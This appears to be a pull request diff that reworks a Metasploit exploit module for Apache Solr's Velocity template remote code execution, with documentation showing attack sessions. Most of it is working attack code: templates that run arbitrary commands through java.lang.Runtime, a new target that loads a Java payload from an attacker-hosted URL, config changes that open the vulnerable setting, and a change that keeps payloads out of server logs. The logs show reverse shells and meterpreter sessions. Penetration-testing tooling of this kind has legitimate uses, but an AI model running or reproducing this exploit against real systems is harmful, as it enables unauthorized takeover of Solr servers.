### PR TITLE
Fixes for Solr RCE

### DIFF
--- a/documentation/modules/exploit/multi/http/solr_velocity_rce.md
+++ b/documentation/modules/exploit/multi/http/solr_velocity_rce.md
@@ -40,6 +40,10 @@ Apache Solr <= 8.3.0
 Privileges gained are dependent on the user running Solr. Currently,
 this module only supports basic auth.
 
+The "Java (in-memory)" target should work on any vulnerable system
+regardless of OS. It requires that the victim system be able to make
+HTTP requests to the attack platform.
+
 Windows systems have 3 targets:
 1. x86/64 Windows PowerShell: Uses `PowerShell` to get a shell. Payload defaults to `windows/meterpreter/reverse_tcp`
 2. x86/64 Windows CmdStager: Uses `CmdStager` to get a shell. Payload defaults to `windows/meterpreter/reverse_tcp`
@@ -48,63 +52,6 @@ Windows systems have 3 targets:
 *nix systems have 2 targets:
 1. Unix (in memory): Uses command execution. Payload defaults to `cmd/unix/reverse_bash`. Output may be returned depending on payload used.
 2. Linux (dropper): Uses `CmdStager`. Payload defaults to `linux/x86/meterpreter/reverse_tcp`
-
-Some `cmd/unix` payloads do not work due to a quoting problem: the entire command in the Velocity template is single-quoted
-for the convenience of `CmdStager`. Some `cmd/unix` are single-quoted, so this breaks the Velocity template.
-
-The full list of `cmd/unix` payloads that do not work due to the quoting problem are listed below:
-1. cmd/unix/bind_awk
-2. cmd/unix/bind_lua
-3. cmd/unix/bind_nodejs
-4. cmd/unix/bind_r
-5. cmd/unix/bind_ruby
-6. cmd/unix/bind_socat_udp
-7. cmd/unix/reverse_awk
-8. cmd/unix/reverse_lua
-9. cmd/unix/reverse_nodejs
-10. cmd/unix/reverse_perl
-11. cmd/unix/reverse_perl_ssl
-12. cmd/unix/reverse_php_ssl
-13. cmd/unix/reverse_python
-14. cmd/unix/reverse_python_ssl
-15. cmd/unix/reverse_r
-16. cmd/unix/reverse_ruby
-17. cmd/unix/reverse_ruby_ssl
-18. cmd/unix/reverse_socat_udp
-29. generic/shell_bind_tcp
-20. generic/shell_reverse_tcp
-
-The full list of `cmd/unix` payloads that work:
-1. cmd/unix/bind_netcat
-2. cmd/unix/bind_netcat_gaping
-3. cmd/unix/bind_perl
-4. cmd/unix/bind_zsh
-5. cmd/unix/generic
-6. cmd/unix/pingback_bind
-7. cmd/unix/pingback_reverse
-8. cmd/unix/reverse
-9. cmd/unix/reverse_bash
-10. cmd/unix/reverse_bash_udp
-11. cmd/unix/reverse_ksh
-12. cmd/unix/reverse_openssl
-13. cmd/unix/reverse_ncat_ssl
-14. cmd/unix/reverse_netcat
-15. cmd/unix/reverse_netcat_gaping
-16. cmd/unix/reverse_zsh
-
-These `cmd/unix` payloads have not fully tested with this module:
-1. cmd/unix/bind_busybox_telnetd
-3. cmd/unix/bind_netcat_gaping_ipv6
-3. cmd/unix/bind_perl_ipv6
-4. cmd/unix/bind_ruby_ipv6
-5. cmd/unix/reverse_bash_telnet_ssl
-6. cmd/unix/reverse_ssl_double_telnet
-
-These `cmd/unix` payloads have not been tested:
-1. cmd/unix/bind_stub
-2. cmd/unix/reverse_stub
-3. generic/custom
-
 
 ## Examples
 
@@ -121,7 +68,7 @@ msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 2
 TARGET => 2
 msf5 exploit(multi/http/solr_velocity_rce) > exploit
 
-[*] Started reverse TCP handler on 192.168.137.128:4444 
+[*] Started reverse TCP handler on 192.168.137.128:4444
 [*] Found Apache Solr 8.3.0
 [*] OS version is Windows Server 2019 amd64 10.0
 [*] Found core(s): techproducts
@@ -143,7 +90,7 @@ meterpreter >
 
 ### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, using CmdStager
 ```
-msf5 > use exploit/multi/http/solr_velocity_rce 
+msf5 > use exploit/multi/http/solr_velocity_rce
 msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155
 RHOSTS => 192.168.137.132
 msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
@@ -154,7 +101,7 @@ msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 3
 TARGET => 3
 msf5 exploit(multi/http/solr_velocity_rce) > exploit
 
-[*] Started reverse TCP handler on 192.168.137.128:4444 
+[*] Started reverse TCP handler on 192.168.137.128:4444
 [*] Found Apache Solr 8.3.0
 [*] OS version is Windows Server 2019 amd64 10.0
 [*] Found core(s): techproducts
@@ -186,12 +133,12 @@ System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 1
 Meterpreter     : x86/windows
-meterpreter > 
+meterpreter >
 ```
 
 ### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, with payload `cmd/windows/generic`
 ```
-msf5 > use exploit/multi/http/solr_velocity_rce 
+msf5 > use exploit/multi/http/solr_velocity_rce
 msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155
 RHOSTS => 192.168.137.132
 msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
@@ -210,12 +157,12 @@ msf5 exploit(multi/http/solr_velocity_rce) > exploit
 [*] Targeting core 'techproducts'
 [+] 2k19dtctr\administrator
 [*] Exploit completed, but no session was created.
-msf5 exploit(multi/http/solr_velocity_rce) > 
+msf5 exploit(multi/http/solr_velocity_rce) >
 ```
 
 ### Bitnami Solr VM 8.3.0, requiring basic authentication, command execution in-memory, with payload `cmd/unix/reverse_bash`
 ```
-msf5 > use exploit/multi/http/solr_velocity_rce 
+msf5 > use exploit/multi/http/solr_velocity_rce
 msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129
 RHOSTS => 192.168.137.129
 msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80
@@ -232,7 +179,7 @@ msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444
 LPORT => 4444
 msf5 exploit(multi/http/solr_velocity_rce) > exploit
 
-[*] Started reverse TCP handler on 192.168.137.128:4444 
+[*] Started reverse TCP handler on 192.168.137.128:4444
 [*] Found Apache Solr 8.3.0
 [*] OS version is Linux amd64 4.9.0-11-amd64
 [*] Found core(s): techproducts
@@ -245,7 +192,7 @@ uid=999(solr) gid=1002(solr) groups=1002(solr)
 
 ### Bitnami Solr VM 8.3.0, requiring basic authentication, command execution in-memory, with payload `cmd/unix/generic`
 ```
-msf5 > use exploit/multi/http/solr_velocity_rce 
+msf5 > use exploit/multi/http/solr_velocity_rce
 msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129
 RHOSTS => 192.168.137.129
 msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80
@@ -264,19 +211,19 @@ msf5 exploit(multi/http/solr_velocity_rce) > set CMD whoami
 CMD => whoami
 msf5 exploit(multi/http/solr_velocity_rce) > exploit
 
-[*] Started reverse TCP handler on 192.168.137.128:4444 
+[*] Started reverse TCP handler on 192.168.137.128:4444
 [*] Found Apache Solr 8.3.0
 [*] OS version is Linux amd64 4.9.0-11-amd64
 [*] Found core(s): techproducts
 [*] Targeting core 'techproducts'
 [+] solr
 [*] Exploit completed, but no session was created.
-msf5 exploit(multi/http/solr_velocity_rce) > 
+msf5 exploit(multi/http/solr_velocity_rce) >
 ```
 
 ### Bitnami Solr VM 8.3.0, requiring basic authentication, using CmdStager, with payload `linux/x86/meterpreter/reverse_tcp`
 ```
-msf5 > use exploit/multi/http/solr_velocity_rce 
+msf5 > use exploit/multi/http/solr_velocity_rce
 msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129
 RHOSTS => 192.168.137.129
 msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80
@@ -293,7 +240,7 @@ msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444
 LPORT => 4444
 msf5 exploit(multi/http/solr_velocity_rce) > exploit
 
-[*] Started reverse TCP handler on 192.168.137.128:4444 
+[*] Started reverse TCP handler on 192.168.137.128:4444
 [*] Found Apache Solr 8.3.0
 [*] OS version is Linux amd64 4.9.0-11-amd64
 [*] Found core(s): techproducts
@@ -313,5 +260,5 @@ OS           : Debian 9.11 (Linux 4.9.0-11-amd64)
 Architecture : x64
 BuildTuple   : i486-linux-musl
 Meterpreter  : x86/linux
-meterpreter > 
+meterpreter >
 ```

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -185,7 +185,11 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # send a GET request to get Solr and system details
-    ver = solr_get('uri' => normalize_uri(target_uri.path, '/admin/info/system'), 'auth' => @auth_string)
+    ver = solr_get(
+      'uri' => normalize_uri(target_uri.path, '/admin/info/system'),
+      'vars_get' => { 'wt' => 'json' },
+      'auth' => @auth_string
+    )
 
     # can't connect? that's an automatic failure
     unless ver
@@ -214,7 +218,11 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # enumerate cores
-    cores = solr_get('uri' => normalize_uri(target_uri.path, '/admin/cores'), 'auth' => @auth_string)
+    cores = solr_get(
+      'uri' => normalize_uri(target_uri.path, '/admin/cores'),
+      'vars_get' => { 'wt' => 'json' },
+      'auth' => @auth_string
+    )
 
     # can't connect? that's yet another automatic failure
     unless cores

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -251,6 +251,11 @@ class MetasploitModule < Msf::Exploit::Remote
       # for each core, attempt to get config
       core_config_json = get_response_writer_config(core.to_s)
 
+      if core_config_json.dig('config','queryResponseWriter').blank?
+        print_error("Failed to get queryResponseWriter configuration for core '#{core}'")
+        next
+      end
+
       core_config_json['config']['queryResponseWriter'].each do |writer_name, writer_config|
         # The default name is 'velocity' but a queryResponseWriter can have an
         # arbitrary name. The classname is diagnostic.
@@ -343,7 +348,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with Failure::UnexpectedReply, "Unable to update config, exploit failed!"
     end
 
-    response_json = update_config.get_json_document
+    update_config.get_json_document
   end
 
   # the exploit method

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -249,30 +249,25 @@ class MetasploitModule < Msf::Exploit::Remote
 
     cores_list.each do |core|
       # for each core, attempt to get config
-      core_config = solr_get('uri' => normalize_uri(target_uri.path, core.to_s, 'config'), 'auth' => @auth_string)
+      core_config_json = get_response_writer_config(core.to_s)
 
-      # can't retrieve configuration for that core? go next
-      unless core_config
-        print_error("Could not retrieve configuration for core #{core}!")
-        next
-      end
+      core_config_json['config']['queryResponseWriter'].each do |writer_name, writer_config|
+        # The default name is 'velocity' but a queryResponseWriter can have an
+        # arbitrary name. The classname is diagnostic.
+        if 'solr.VelocityResponseWriter' == writer_config['class']
+          print_good("Found Velocity Response Writer in use by core '#{core}'")
+          vprint_status("Writer config: #{writer_config}")
 
-      # convert to JSON
-      core_config_json = core_config.get_json_document
-      # if the core configuration does not include the Velocity Response Writer, it isn't vulnerable
-      if core_config_json['config']['queryResponseWriter'].keys.include?("velocity")
-        vprint_good("Found Velocity Response Writer in use by core #{core}")
-        if core_config_json['config']['queryResponseWriter']['velocity']['params.resource.loader.enabled'] == "true"
-          vprint_good("params.resource.loader.enabled for core '#{core}' is set to true.")
-          possibly_vulnerable_cores.store(core, true)
-        else
-          # if params.resource.loader.enabled is false, we need to set it to true before exploitation
-          print_warning("params.resource.loader.enabled for core #{core} is set to false.")
-          possibly_vulnerable_cores.store(core, false)
+          # String 'true' from the remote configuration, not TrueClass
+          if 'true' == writer_config['params.resource.loader.enabled']
+            print_good("params.resource.loader.enabled for core '#{core}' is set to true.")
+            possibly_vulnerable_cores.store(core, writer_name)
+          else
+            # if params.resource.loader.enabled is false, we need to set it to true before exploitation
+            print_warning("params.resource.loader.enabled for core '#{core}' is set to false.")
+            possibly_vulnerable_cores.store(core, false)
+          end
         end
-      else
-        vprint_error("Velocity Response Writer not found in core #{core}")
-        next
       end
     end
 
@@ -282,7 +277,7 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       # if possible, pick a core that already has params.resource.loader.enabled set to true
       possibly_vulnerable_cores.each do |core|
-        if core[1] == true
+        if core[1]
           @vuln_core = core
           break
         end
@@ -295,6 +290,62 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
+  def get_response_writer_config(core)
+    core_config = solr_get(
+      'uri' => normalize_uri(target_uri.path, core.to_s, 'config', 'queryResponseWriter'),
+      'auth' => @auth_string
+    )
+
+    if core_config
+      return core_config.get_json_document
+    else
+      print_error("Could not retrieve configuration for core '#{core}'!")
+      return nil
+    end
+  end
+
+
+  def change_response_writer(core, verb: 'update')
+    # the new config in JSON format
+    enable_params_resource_loader = {
+      "#{verb}-queryresponsewriter": {
+        "startup": "lazy",
+        "name": "velocity",
+        "class": "solr.VelocityResponseWriter",
+        #"template.base.dir": "",
+        #"solr.resource.loader.enabled": "true",
+        "params.resource.loader.enabled": "true"
+      }
+    }.to_json
+
+    opts_post = {
+      'method'        => 'POST',
+      'connection'    => 'Keep-Alive',
+      'ctype'         => 'application/json;charset=utf-8',
+      'encode_params' => false,
+      'uri'           => normalize_uri(target_uri.path, core, 'config'),
+      'data'          => enable_params_resource_loader
+    }
+
+    unless @auth_string == ""
+      opts_post.store('authorization', @auth_string)
+    end
+
+    print_status("params.resource.loader.enabled is false for '#{core}', trying to #{verb} it...")
+    update_config = send_request_cgi(opts_post)
+
+    unless update_config
+      fail_with Failure::Unreachable, "Connection failed!"
+    end
+
+    # if we got anything other than a 200 back, the configuration update failed and the exploit won't work
+    unless update_config.code == 200
+      fail_with Failure::UnexpectedReply, "Unable to update config, exploit failed!"
+    end
+
+    response_json = update_config.get_json_document
+  end
+
   # the exploit method
   def exploit
     unless [CheckCode::Vulnerable].include? check
@@ -304,51 +355,28 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Targeting core '#{@vuln_core[0]}'")
 
     # if params.resource.loader.enabled for that core is false
-    if @vuln_core[1] != true
-      # the new config in JSON format
-      enable_params_resource_loader = {
-        "update-queryresponsewriter": {
-          "startup": "lazy",
-          "name": "velocity",
-          "class": "solr.VelocityResponseWriter",
-          "template.base.dir": "",
-          "solr.resource.loader.enabled": "true",
-          "params.resource.loader.enabled": "true"
-        }
-      }.to_json
+    if !@vuln_core[1]
+      response_json = change_response_writer(@vuln_core[0], verb: 'update')
 
-      opts_post = {
-        'method'        => 'POST',
-        'connection'    => 'Keep-Alive',
-        'ctype'         => 'application/json;charset=utf-8',
-        'encode_params' => false,
-        'uri'           => normalize_uri(target_uri.path, @vuln_core[0].to_s, 'config'),
-        'data'          => enable_params_resource_loader
-      }
-
-      unless @auth_string == ""
-        opts_post.store('authorization', @auth_string)
+      if response_json.has_key?('errorMessages')
+        server_error = response_json['errorMessages'].first['errorMessages']&.first
+        print_error("Error updating config, here's the message from the server: \"#{server_error}\"")
+        response_json = change_response_writer(@vuln_core[0], verb: 'create')
       end
-
-      print_status("params.resource.loader.enabled is false, setting it to true...")
-      update_config = send_request_cgi(opts_post)
-
-      unless update_config
-        fail_with Failure::Unreachable, "Connection failed!"
-      end
-
-      # if we got anything other than a 200 back, the configuration update failed and the exploit won't work
-      unless update_config.code == 200
-        fail_with Failure::UnexpectedReply, "Unable to update config, exploit failed!"
-      end
-
     end
-    print_good("params.resource.loader.enabled is true for core #{@vuln_core[0]}")
+
+    core_config_json = get_response_writer_config(@vuln_core[0])
+
+    if core_config_json.dig('config','queryResponseWriter','velocity','params.resource.loader.enabled')
+      print_good("params.resource.loader.enabled is true for core '#{@vuln_core[0]}'")
+    else
+      print_warning("Config change appears to have failed but I'll try anyway. Wish me luck.")
+    end
 
     case target.name
     when /Java/
       @classloader_uri = start_service
-      execute_java('auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+      execute_java('core_name' => @vuln_core[0])
       return
     end
 
@@ -356,7 +384,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if @target_platform.include? "Windows"
       # if target is wrong, warn and exit before doing anything
       unless target.name.include? "Windows"
-        fail_with Failure::NoTarget, "Target is found to be Windows, please select the proper target!"
+        fail_with Failure::BadConfig, "Target is found to be Windows, please select the proper target!"
       end
 
       case target['Type']
@@ -411,7 +439,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if @target_platform.include? "Linux"
       # if target is wrong, warn and exit before doing anything
       if target.name.include? "Windows"
-        fail_with Failure::NoTarget, "Target is found to be nix-based, please select the proper target!"
+        fail_with Failure::BadConfig, "Target is found to be nix-based, please select the proper target!"
       end
 
       case target['Type']
@@ -459,7 +487,11 @@ class MetasploitModule < Msf::Exploit::Remote
     }
 
 =begin
-    # Here's an example of a template that can base64 decode a header:
+    # Here's an example of a template that can base64 decode a header.
+    # This only works on Solr versions after 6.6 that introduced the
+    # getHttpSolrCall method, allowing us access to the request headers. Also,
+    # java.util.Base64 was introduced in java 1.8, so older installs are
+    # likely not to have that either.
     %q{
       #set($b=$request.getHttpSolrCall().req.getHeader("X-A00"))
       #set($c=$b.getClass().getClass())
@@ -479,7 +511,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'q'                 => '1',
         'wt'                => 'velocity',
         'v.template'        => 'custom',
-        'v.template.custom' => template
+        'v.template.custom' => template.gsub(/^[[:space:]]*/, "")
       }
     )
 
@@ -488,47 +520,48 @@ class MetasploitModule < Msf::Exploit::Remote
     if raw_result&.code != 200
       #pp raw_result.headers
       vprint_error raw_result.body
-      fail_with Failure::PayloadFailed, "Payload failed to execute!"
+      fail_with Failure::PayloadFailed, "Velocity template caused an exception on the server"
     end
   end
 
   # sic 'em, bois!
   def execute_command(cmd, opts = {})
-    header_name = "X-" + Rex::Text.rand_text_alpha_upper(8)
     # custom template which enables command execution
     template = %q{
-      #set($c=$request.getHttpSolrCall().req.getHeader("}+header_name+%q{"))
+      #set($c = $request.getParams().get("c"))
       #set($x="")
       #set($rt=$x.class.forName("java.lang.Runtime"))
-      #set($chr=$x.class.forName("java.lang.Character"))
-      #set($str=$x.class.forName("java.lang.String"))
       #set($ex=$rt.getRuntime().exec($c))
-      #$ex.waitFor()
     }
 
     # the next 2 lines cause problems with CmdStager, so it's only used when needed
     # during the check for PowerShell existence, or by specific payloads
     if opts['winenv_check'] || target['Type'] == :windows_exec || target['Type'] == :unix_memory
       template += <<~VELOCITY
+        #set($a=$ex.waitFor())
         #set($out=$ex.getInputStream())
-        #if($out.available())
-        #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
-        #else
+        #if($out.available() > 0)
+          #set($chr=$x.class.forName("java.lang.Character"))
+          #set($str=$x.class.forName("java.lang.String"))
+          #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
         #end
       VELOCITY
     end
 
     # execute the exploit...
+    # POST, so our payload doesn't end up in logs
     raw_result = solr_get(
+      'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, opts['core_name'].to_s, 'select'),
       'auth' => opts['auth_string'],
-      'headers' => { header_name => cmd },
-      'vars_get' =>  {
+      'vars_post' =>  {
         'q'                 => '1',
         'wt'                => 'velocity',
         'v.template'        => 'custom',
-        'v.template.custom' => template
-      }
+        'v.template.custom' => template.gsub(/^[[:space:]]*/, ""),
+        'c'                 => cmd,
+      },
+      'timeout' => 1
     )
 
     # Executing PATH always gives a result, so it can return safely
@@ -539,6 +572,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # for printing command output
     unless raw_result.nil?
       unless raw_result.code == 200
+        vprint_error raw_result.body
         fail_with Failure::PayloadFailed, "Payload failed to execute!"
       end
 

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -12,6 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::HttpClient
 
+  include Msf::Exploit::Remote::Java::HTTP::ClassLoader
+
   def initialize(info = {})
     super(
       update_info(
@@ -335,9 +337,12 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     print_good("params.resource.loader.enabled is true for core #{@vuln_core[0]}")
 
-    execute_java('auth_string' => @auth_string, 'core_name' => @vuln_core[0])
-    #execute_command('id', 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
-    return
+    case target.name
+    when /Java/
+      @classloader_uri = start_service
+      execute_java('auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+      return
+    end
 
     # windows...
     if @target_platform.include? "Windows"
@@ -424,71 +429,59 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def chunk_string(string, size = 4096)
-    n_chunks = ((string.length + size - 1)/ size)
-
-    vprint_status("Payload is #{string.length} chars long, breaking into #{n_chunks} chunks of #{size}")
-    n_chunks.times.collect { |i| string[i * size, size] }
-  end
-
   def execute_java(opts = {})
 
-    # I think this would work if we had the payload as just a .class instead
-    # of a whole .jar. I don't know how to get that yet, though.
-    #
-    # Fails with this exception when invoking defineClass
-    #
-    #   Caused by: java.lang.ClassFormatError: Incompatible magic value 1347093252 in class file &lt;Unknown&gt;
-    #      at java.base/java.lang.ClassLoader.defineClass1(Native Method)
-    #      at java.base/java.lang.ClassLoader.defineClass(ClassLoader.java:1016)
-    #      at java.base/java.lang.ClassLoader.defineClass(ClassLoader.java:803)
-    #
-    template = %q{
+    template =
+=begin
+    %q{
       #set($b=$request.getHttpSolrCall().req.getHeader("X-A00"))
       #set($c=$b.getClass().getClass())
+      #set($d=$c.forName("java.util.Base64").getMethod("getDecoder",null).invoke(null, null))
+      $d.decode($b)
+    }
+=end
+    %q{
+      #set($_="")
+      #set($c=$_.getClass().getClass())
       #set($a=$c.forName("java.util.ArrayList"))
       #set($l=$a.newInstance())
       #set($o=$c.forName("java.lang.Object"))
       #set($q=$a.getMethod("add",$o).invoke($l,"x"))
       #set($i=$c.forName("java.lang.Integer").getField("TYPE").get(null))
-      #set($n=$c.forName("java.lang.reflect.Array").getMethod("newInstance",$c,$i))
-      #set($l[0]=$n.invoke(null,$c.forName("java.net.URL"),0))
-      #set($r=$c.forName("java.net.URLClassLoader").getConstructor($c.forName("[Ljava.net.URL;")).newInstance($l.toArray()))
-      #set($m=$c.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", $c.forName("[B"),$i,$i))
-      #set($_=$m.setAccessible(true))
-      #set($decoder_c=$c.forName("java.util.Base64").getMethod("getDecoder",null).invoke(null, null))
-      #set($l[0]=$decoder_c.decode($b))
-      #set($s=$c.forName("java.lang.reflect.Array").getMethod("getLength",$o).invoke(null,$l.toArray()))
-    }+ # Error in next line
-    %q{
-      #set($z=$m.invoke($r,$l[0],0,$s))
-      #set($l[0]=$n.invoke(null,$c.forName("java.lang.String"),0))
-      #set($_=$z.getMethod("main", $c.forName("[Ljava.lang.String;")).invoke(null,$l.toArray()))
+      #set($url=$c.forName("java.net.URL").getConstructor($c.forName("java.lang.String")).newInstance("} + @classloader_uri + %q{"))
+      #set($ani=$c.forName("java.lang.reflect.Array").getMethod("newInstance",$c,$i))
+      #set($l[0]=$ani.invoke(null,$c.forName("java.net.URL"),1))
+      #set($l[0][0]=$url)
+      #set($url_cl=$c.forName("java.net.URLClassLoader").getConstructor($c.forName("[Ljava.net.URL;")).newInstance($l.toArray()))
+      #set($z=$url_cl.loadClass("metasploit.Payload"))
+      #set($l[0]=$ani.invoke(null,$c.forName("java.lang.String"),0))
+      #set($_=$z.getMethod("main",$c.forName("[Ljava.lang.String;")).invoke(null,$l.toArray()))
     }
 
-    #puts Rex::Text.to_hex_dump(payload.encoded)
-
-    b64_payload = Rex::Text.encode_base64(payload.encoded)
-    chunks = chunk_string(b64_payload, 8192)
-    headers = {}
-    chunks.each_with_index do |chunk, idx|
-      headers["X-A%02x" % idx] = chunk
-    end
+=begin
+    # Here's an example of a template that can base64 decode a header:
+    %q{
+      #set($b=$request.getHttpSolrCall().req.getHeader("X-A00"))
+      #set($c=$b.getClass().getClass())
+      #set($s=$c.forName("java.lang.String").getConstructor("[B"))
+      #set($d=$c.forName("java.util.Base64").getMethod("getDecoder",null).invoke(null, null))
+      #set($payloadByteArray=$d.decode($b))
+      #set($decoded_str=$s.invoke($payloadByteArray))
+      $decoded_str
+    }
+=end
 
     # execute the exploit...
-    raw_result = send_request_cgi(
-      'method' => 'POST',
+    raw_result = solr_get(
       'uri' => normalize_uri(target_uri.path, opts['core_name'].to_s, 'select'),
       'auth' => opts['auth_string'],
-      'headers' => headers,
-      'vars_post' =>  {
+      'vars_get' =>  {
         'q'                 => '1',
         'wt'                => 'velocity',
         'v.template'        => 'custom',
         'v.template.custom' => template
       }
     )
-    puts raw_result.body
 
     # for printing command output
     unless raw_result.nil?
@@ -504,7 +497,6 @@ class MetasploitModule < Msf::Exploit::Remote
     # custom template which enables command execution
     template = %q{
       #set($c=$request.getHttpSolrCall().req.getHeader("X-MSF"))
-      $c
       #set($x="")
       #set($rt=$x.class.forName("java.lang.Runtime"))
       #set($chr=$x.class.forName("java.lang.Character"))

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -50,6 +50,15 @@ class MetasploitModule < Msf::Exploit::Remote
         'Targets'        =>
             [
               [
+                'Java (in-memory)',
+                {
+                  'Platform'       => 'java',
+                  'Arch'           => ARCH_JAVA,
+                  'Type'           => :java,
+                  'DefaultOptions' => { 'PAYLOAD' => 'java/meterpreter/reverse_tcp' }
+                }
+              ],
+              [
                 'Unix (in-memory)',
                 {
                   'Platform'       => 'unix',
@@ -323,8 +332,12 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with Failure::UnexpectedReply, "Unable to update config, exploit failed!"
       end
 
-      print_good("params.resource.loader.enabled is now set to true!")
     end
+    print_good("params.resource.loader.enabled is true for core #{@vuln_core[0]}")
+
+    execute_java('auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+    #execute_command('id', 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+    return
 
     # windows...
     if @target_platform.include? "Windows"
@@ -411,30 +424,94 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
+  def chunk_string(string, size = 4096)
+    n_chunks = ((string.length + size - 1)/ size)
+
+    vprint_status("Payload is #{string.length} chars long, breaking into #{n_chunks} chunks of #{size}")
+    n_chunks.times.collect { |i| string[i * size, size] }
+  end
+
+  def execute_java(opts = {})
+
+    # I think this would work if we had the payload as just a .class instead
+    # of a whole .jar. I don't know how to get that yet, though.
+    #
+    # Fails with this exception when invoking defineClass
+    #
+    #   Caused by: java.lang.ClassFormatError: Incompatible magic value 1347093252 in class file &lt;Unknown&gt;
+    #      at java.base/java.lang.ClassLoader.defineClass1(Native Method)
+    #      at java.base/java.lang.ClassLoader.defineClass(ClassLoader.java:1016)
+    #      at java.base/java.lang.ClassLoader.defineClass(ClassLoader.java:803)
+    #
+    template = %q{
+      #set($b=$request.getHttpSolrCall().req.getHeader("X-A00"))
+      #set($c=$b.getClass().getClass())
+      #set($a=$c.forName("java.util.ArrayList"))
+      #set($l=$a.newInstance())
+      #set($o=$c.forName("java.lang.Object"))
+      #set($q=$a.getMethod("add",$o).invoke($l,"x"))
+      #set($i=$c.forName("java.lang.Integer").getField("TYPE").get(null))
+      #set($n=$c.forName("java.lang.reflect.Array").getMethod("newInstance",$c,$i))
+      #set($l[0]=$n.invoke(null,$c.forName("java.net.URL"),0))
+      #set($r=$c.forName("java.net.URLClassLoader").getConstructor($c.forName("[Ljava.net.URL;")).newInstance($l.toArray()))
+      #set($m=$c.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", $c.forName("[B"),$i,$i))
+      #set($_=$m.setAccessible(true))
+      #set($decoder_c=$c.forName("java.util.Base64").getMethod("getDecoder",null).invoke(null, null))
+      #set($l[0]=$decoder_c.decode($b))
+      #set($s=$c.forName("java.lang.reflect.Array").getMethod("getLength",$o).invoke(null,$l.toArray()))
+    }+ # Error in next line
+    %q{
+      #set($z=$m.invoke($r,$l[0],0,$s))
+      #set($l[0]=$n.invoke(null,$c.forName("java.lang.String"),0))
+      #set($_=$z.getMethod("main", $c.forName("[Ljava.lang.String;")).invoke(null,$l.toArray()))
+    }
+
+    #puts Rex::Text.to_hex_dump(payload.encoded)
+
+    b64_payload = Rex::Text.encode_base64(payload.encoded)
+    chunks = chunk_string(b64_payload, 8192)
+    headers = {}
+    chunks.each_with_index do |chunk, idx|
+      headers["X-A%02x" % idx] = chunk
+    end
+
+    # execute the exploit...
+    raw_result = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, opts['core_name'].to_s, 'select'),
+      'auth' => opts['auth_string'],
+      'headers' => headers,
+      'vars_post' =>  {
+        'q'                 => '1',
+        'wt'                => 'velocity',
+        'v.template'        => 'custom',
+        'v.template.custom' => template
+      }
+    )
+    puts raw_result.body
+
+    # for printing command output
+    unless raw_result.nil?
+      unless raw_result.code == 200
+        pp raw_result.headers
+        fail_with Failure::PayloadFailed, "Payload failed to execute!"
+      end
+    end
+  end
+
   # sic 'em, bois!
   def execute_command(cmd, opts = {})
     # custom template which enables command execution
-    template = <<~VELOCITY
+    template = %q{
+      #set($c=$request.getHttpSolrCall().req.getHeader("X-MSF"))
+      $c
       #set($x="")
       #set($rt=$x.class.forName("java.lang.Runtime"))
       #set($chr=$x.class.forName("java.lang.Character"))
       #set($str=$x.class.forName("java.lang.String"))
-    VELOCITY
-
-    # attempts to solve the quoting problem, partially successful
-    if target.name.include?("Unix")
-      template += <<~VELOCITY
-        #set($ex=$rt.getRuntime().exec("#{cmd}"))
-      VELOCITY
-    else
-      template += <<~VELOCITY
-        #set($ex=$rt.getRuntime().exec('#{cmd}'))
-      VELOCITY
-    end
-
-    template += <<~VELOCITY
-      $ex.waitFor()
-    VELOCITY
+      #set($ex=$rt.getRuntime().exec($c))
+      #$ex.waitFor()
+    }
 
